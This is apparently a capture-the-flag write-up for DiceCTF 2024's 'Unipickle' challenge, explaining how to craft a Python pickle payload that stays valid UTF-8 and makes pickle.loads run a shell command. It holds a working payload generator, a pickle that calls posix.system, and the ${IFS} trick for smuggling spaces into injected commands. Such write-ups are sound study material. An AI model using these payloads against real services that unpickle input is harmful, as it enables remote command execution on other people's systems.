DiceCTF 2024 qualifications Unipickle Writeup

Published: September 18, 2025, updated: September 18, 2025

The challenge server runs a Python script called unipickle.py with the following code:

#!/usr/local/bin/python
import pickle
pickle.loads(input("pickle: ").split()[0].encode())

The Python script performs the following steps:

  1. Prompt the user to input a string with pickle: .
  2. Parse the user input as a Unicode string.
  3. Split the string by whitespace
  4. Take the first part
  5. Encode the string as UTF-8 bytes to get a bytes() object.
  6. Call pickle.loads() on the resulting bytes() object.

To solve the challenge, you need to pass a valid Unicode string. This string must then contain something that pickle.loads() can work with after the script turns it to a UTF-8 encoded bytes() object.

Python pickle protocol versions

I’ve stored a pickled Python object in a file called uname.pickle. When you run pickle.loads() on this file’s contents, Python runs uname on your system.

Here’s how the contents of the pickle file look like when you print them with xxd:

00000000: 6370 6f73 6978 0a73 7973 7465 6d0a 2856  cposix.system.(V
00000010: 756e 616d 650a 7452 2e                   uname.tR.

You can visualize the contents of this Python pickle using the pickletools module with python3 -m pickletools:

python3 -m pickletools uname.pickle

This prints the following:

    0: c    GLOBAL     'posix system'
   14: (    MARK
   15: V        UNICODE    'uname'
   22: t        TUPLE      (MARK at 14)
   23: R    REDUCE
   24: .    STOP
highest protocol among opcodes = 0

Python pickles have different protocol versions. Protocol version 0 is useful for deserialization attacks because its opcodes are printable ASCII. Opcodes and inputs are split with newlines.

Yet, in this challenge the unipickle.py script only looks at the first part of the input after calling .split() on it. That makes it difficult to work with version 0.

I instead chose to focus on understanding how I can create a protocol version 4 payload that still passes as valid UTF-8.

Smuggling higher values as Unicode characters

The trick is to smuggle version 4 protocol opcodes inside UTF-8 strings. This technique is called Unicode injection and belongs to a larger class of attacks called encoded injection.

You can encode the following byte sequences and generate valid UTF-8 sequences:

  1. 0xxx xxxx
  2. 110x xxxx 10xx xxxx
  3. 1110 xxxx 10xx xxxx 10xx xxxx
  4. 1111 0xxx 10xx xxxx 10xx xxxx

As long as all version 4 protocol opcodes and their following bytes match any of the four possible UTF-8 sequences, unipickle.py accepts your input.

Note: another method that prevents unipickle.py from removing parts of your input is using ${IFS} as a space replacement for command injections. This is how it looks like when you replace space characters from head /flag* with ${IFS}:

head${IFS}/flag*

Payload generator

Here’s the payload generator:

#!/usr/bin/env python3
import sys
import math

start = b'U\x05posixU\x06systemq\xc2\x93'

end = b'tR.'

padding = "${IFS}"

minimum_padded_length = 33

def make_payload(payload: str) -> bytes:
    payload = payload.replace(" ", padding)

    length = len(payload)
    assert length < 124

    missing = minimum_padded_length - length

    add_padding_count = int(math.ceil(missing / len(padding)))

    payload = payload + (padding * add_padding_count)

    return start + f'(U{chr(len(payload))}{payload}'.encode() + end


payload = "head /flag*"
encoded = make_payload(payload).decode()
print(encoded)

Here’s the payload decoded with pickletools:

    0: U    SHORT_BINSTRING 'posix'
    7: U    SHORT_BINSTRING 'system'
   15: q    BINPUT     194
   17: \x93 STACK_GLOBAL
   18: (    MARK
   19: U        SHORT_BINSTRING 'head${IFS}/flag*${IFS}${IFS}${IFS}'
   55: t        TUPLE      (MARK at 18)
   56: R    REDUCE
   57: .    STOP
highest protocol among opcodes = 4

This is what you’ll see when you pipe the payload generator’s output into xxd:

00000000: 5505 706f 7369 7855 0673 7973 7465 6d71  U.posixU.systemq
00000010: c293 2855 2268 6561 6424 7b49 4653 7d2f  ..(U"head${IFS}/
00000020: 666c 6167 2a24 7b49 4653 7d24 7b49 4653  flag*${IFS}${IFS
00000030: 7d24 7b49 4653 7d74 522e 0a              }${IFS}tR..

This challenge requires you to closely study Python’s pickle implementation and goes way beyond just blindly copying YAML payloads.

Tags

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.

Back to Index